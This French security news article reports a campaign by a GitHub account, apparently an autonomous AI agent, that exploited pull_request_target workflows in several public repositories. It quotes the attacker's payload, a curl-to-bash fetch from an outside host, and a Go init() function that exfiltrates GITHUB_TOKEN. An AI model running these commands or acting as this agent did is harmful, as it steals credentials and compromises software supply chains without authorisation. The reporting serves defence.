Hackerbot-Claw : Bot IA exploitant les workflows GitHub Actions

✍️ OpenClawRadar📅 Publié: March 1, 2026🔗 Source
Hackerbot-Claw : Bot IA exploitant les workflows GitHub Actions
Ad

Détails de la campagne d'attaque

Entre le 21 février et le 28 février 2026, un compte GitHub nommé hackerbot-claw a systématiquement analysé des dépôts publics à la recherche de workflows GitHub Actions exploitables. Le compte se décrit comme un "agent de recherche en sécurité autonome alimenté par claude-opus-4-5" et sollicite des dons en cryptomonnaie.

Sur 7 jours, il a :

  • Ciblé au moins 6 dépôts appartenant à Microsoft, DataDog, la CNCF et des projets open source populaires
  • Ouvert plus de 12 pull requests et déclenché des workflows sur les cibles
  • Réussi une exécution de code arbitraire dans au moins 4 d'entre eux
  • Exfiltré un GITHUB_TOKEN avec des permissions d'écriture vers un serveur externe

Cibles et méthodologie

Les cibles incluaient :

  • microsoft/ai-discovery-agent
  • DataDog/datadog-iac-scanner
  • avelino/awesome-go (140k+ étoiles)
  • ambient-code/platform
  • project-akri/akri (un projet CNCF)

Chaque attaque a livré la même charge utile : curl -sSfL hackmoltrepeat.com/molt | bash mais chacune a utilisé une technique complètement différente pour l'exécuter.

Le README du bot révèle sa méthodologie : il charge un "index de modèles de vulnérabilité" avec 9 classes et 47 sous-modèles, puis scanne, vérifie et dépose des preuves de concept d'exploits de manière autonome. Son journal "Activité récente" montre 5 sessions réussies dans les 2 jours précédant l'analyse.

Ad

Attaque 1 : avelino/awesome-go - Vol de jeton via script Go empoisonné

L'attaque la plus dommageable de la campagne a exploité la vulnérabilité classique "Pwn Request" - un workflow pull_request_target qui récupère le code non vérifié d'un fork et l'exécute.

Workflow ciblé : Vérifications de qualité des PR - déclenché automatiquement sur chaque PR, il récupère le code de l'auteur de la PR et exécute go run ./.github/scripts/check-quality/.

L'attaque : L'attaquant a injecté une fonction Go init() dans le script de vérification de qualité. En Go, init() s'exécute automatiquement avant main(), donc le code malveillant s'exécute avant toute vérification légitime.

Dans la tentative finale et la plus dangereuse (PR #6069), la charge utile n'a pas seulement exécuté des commandes arbitraires - elle a exfiltré le GITHUB_TOKEN vers un serveur externe :

func init() {
    _ = exec.Command("bash", "-c", `curl -s -H "Authorization: Bearer $GITHUB_TOKEN" ` +
    `-d "token=$GITHUB_TOKEN&repo=$GITHUB_REPOSITORY" ` +
    `https://recv.hackmoltrepeat.com/ && ` +
    `curl -sSfL https://hackmoltrepeat.com/molt | bash`).Run()
}

L'attaquant a itéré 6 fois sur 18 heures (PR #6058, #6059, #6060, #6061, #6068, #6069), affinant l'approche à chaque fois. Les 4 premières tentatives ont échoué à cause de problèmes de git fetch mais les tentatives 5 et 6 ont réussi.

📖 Lire la source complète : HN AI Agents

Ad

👀 See Also

L'Approche de Vitalik Buterin pour une Configuration Sécurisée de LLM Locale
Security

L'Approche de Vitalik Buterin pour une Configuration Sécurisée de LLM Locale

Vitalik Buterin décrit sa configuration d'LLM souveraine axée sur l'inférence locale, le sandboxing et l'atténuation des risques de confidentialité comme les fuites de données et les jailbreaks.

OpenClawRadar
SCION : L'alternative sécurisée suisse au protocole de routage BGP
Security

SCION : L'alternative sécurisée suisse au protocole de routage BGP

SCION (Scalabilité, Contrôle et Isolation sur les Réseaux de Nouvelle Génération) est une architecture de routage Internet développée à l'ETH Zürich qui remplace les fondations du BGP par une sécurité intégrée et un routage multi-chemins. Contrairement aux correctifs BGP comme RPKI et BGPsec, SCION établit des dizaines ou des centaines de chemins parallèles avec un reroutage en millisecondes en cas de défaillance.

OpenClawRadar
Le dépôt GitHub documente 16 techniques d'injection de prompt et des stratégies de défense pour les chats d'IA publics.
Security

Le dépôt GitHub documente 16 techniques d'injection de prompt et des stratégies de défense pour les chats d'IA publics.

Un développeur a publié un dépôt GitHub détaillant des mesures de sécurité pour les chatbots d'IA publics après que des utilisateurs aient tenté des injections de prompt, des attaques de jeu de rôle, des astuces multilingues et des charges utiles encodées en base64. Le guide inclut une compétence de code Claude pour tester les 16 techniques d'injection documentées.

OpenClawRadar
L'application Claude Android lirait le contenu du presse-papiers sans action explicite de l'utilisateur, selon des rapports.
Security

L'application Claude Android lirait le contenu du presse-papiers sans action explicite de l'utilisateur, selon des rapports.

Un utilisateur rapporte que l'application Claude pour Android a analysé du code provenant de son presse-papiers sans qu'il ne le colle, Claude identifiant le fichier comme pasted_text_b4a56202-3d12-43c8-aa31-a39367a9a354.txt. Le comportement n'a pas pu être reproduit lors de tests ultérieurs.

OpenClawRadar